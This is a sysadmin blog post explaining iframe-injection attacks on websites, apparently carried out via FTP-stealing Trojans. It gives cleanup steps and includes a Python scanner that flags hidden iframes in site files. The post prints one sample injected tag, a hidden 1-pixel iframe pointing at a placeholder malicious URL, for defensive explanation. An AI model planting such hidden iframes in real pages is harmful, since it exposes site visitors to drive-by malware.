Iframe injection website attack and tips to clean the infection
Recently, thousands of legitimate websites have been hacked with the “iframe code injection” attack, resulting in Cross Site Scripting (XSS) for unsuspecting users, who get infected with malware when they visit those legitimate websites. What happens is that an iframe HTML tag is injected, usually at the end, into the “index.php” or “index.html” files of the legitimate website. This iframe embeds malicious code into the legitimate site, which installs a virus on the visitor’s PC or tries to steal sensitive information. The <iframe> HTML tag is used to embed content from another website into the current page. An injected iframe usually looks like the following:
<iframe src="http://some-malicious-web-url" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
The problem is usually not caused by a vulnerability in the website itself but rather by a malware Trojan which infects the website owner’s PC. The Trojan (maybe the Mpack script released by Russians and sold for $1000) steals the website owner’s FTP password and connects to the website as the FTP user, and is thus able to upload and modify files on the website. After the website gets infected, Google usually flags the site with “This Site May Harm Your Computer”, harming the reputation of the website.
Some tips to clean the infection of your site:
- First of all, scan and clean the computer you use to connect to your site. The Trojan might be undetectable by some antivirus products, so you had better format and install a fresh copy of Windows.
- Change ALL your passwords and most importantly the FTP passwords and the website control panel passwords.
- Download all files from your website and store them in a safe place on your PC to further analyze the infection.
- If you have a recent clean backup of your website, upload the backup files and replace all current files.
- If you don’t have a backup (shame on you!!), then open all source code (HTML or PHP files) and search for <iframe> tags inside the code. Delete the suspicious <iframe> tags and re-upload all HTML and PHP files to your website.
- Download an antivirus tool which scans the website for <iframe> content. If you use WordPress, there is an antivirus plugin for it which you can download directly from WordPress.
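The manual search from the tips above, as an added example (not code from the original post): a Python script that walks a downloaded copy of the site, lists every <iframe> tag in .html, .htm and .php files, and marks those hidden the way the injected tag shown earlier is. The function names, the 1-pixel threshold and the sample page are assumptions made for this example.

```python
import re
import sys
from pathlib import Path

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
HIDDEN_CSS_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)
EXTENSIONS = {".html", ".htm", ".php"}  # file types named in the cleanup tips
# Constructed sample: a page with the article's injected tag appended after </html>.
SAMPLE = ('<html><body><iframe src="https://video.example/embed" width="560"></iframe>'
          '</body></html>\n<iframe src="http://some-malicious-web-url" width=1 height=1 '
          'style="visibility:hidden;position:absolute"></iframe>\n')


def hidden_reasons(tag):
    """Return the reasons an <iframe> tag looks deliberately invisible."""
    attrs = {n.lower(): dq or sq or bare for n, dq, sq, bare in ATTR_RE.findall(tag)}
    reasons = []
    for dim in ("width", "height"):
        value = attrs.get(dim, "").strip().lower().rstrip("px")
        if value.isdigit() and int(value) <= 1:  # assumed threshold: 0 or 1 pixel
            reasons.append(f"{dim}={value}")
    if HIDDEN_CSS_RE.search(attrs.get("style", "")):
        reasons.append("hidden style")
    return reasons


def scan_text(text):
    """Return (line_number, tag, reasons) for every iframe tag in text."""
    return [(text.count("\n", 0, m.start()) + 1, m.group(0), hidden_reasons(m.group(0)))
            for m in IFRAME_RE.finditer(text)]


def scan_tree(root):
    """Scan every .html/.htm/.php file under root and return all findings."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in EXTENSIONS:
            text = path.read_text(encoding="utf-8", errors="replace")
            findings += [(str(path), *hit) for hit in scan_text(text)]
    return findings


if __name__ == "__main__":
    # With a directory argument, scan the downloaded site copy; otherwise scan SAMPLE.
    hits = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else [("SAMPLE", *h) for h in scan_text(SAMPLE)]
    for path, line_no, tag, reasons in hits:
        verdict = "SUSPICIOUS: " + ", ".join(reasons) if reasons else "review"
        print(f"{path}:{line_no}: {verdict}: {tag}")
```

Tags reported as “review” are visible iframes that may be legitimate embeds; an iframe written into the page by script does not appear as a literal tag and needs a separate check.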


First Step : change FTP password
Step 2 : Download all files and clean
Step 3 : upload Files
Remember: do not save the FTP password in your FTP client
If you suspect that your system is infected, format and install the OS, then install a good antivirus + firewall. I suggest Avast free edition and Comodo Firewall.
We have received many inquiries and we cleaned those infected sites. If your site is infected, please contact us
Best Regards,
Team HelloSystemadmin.com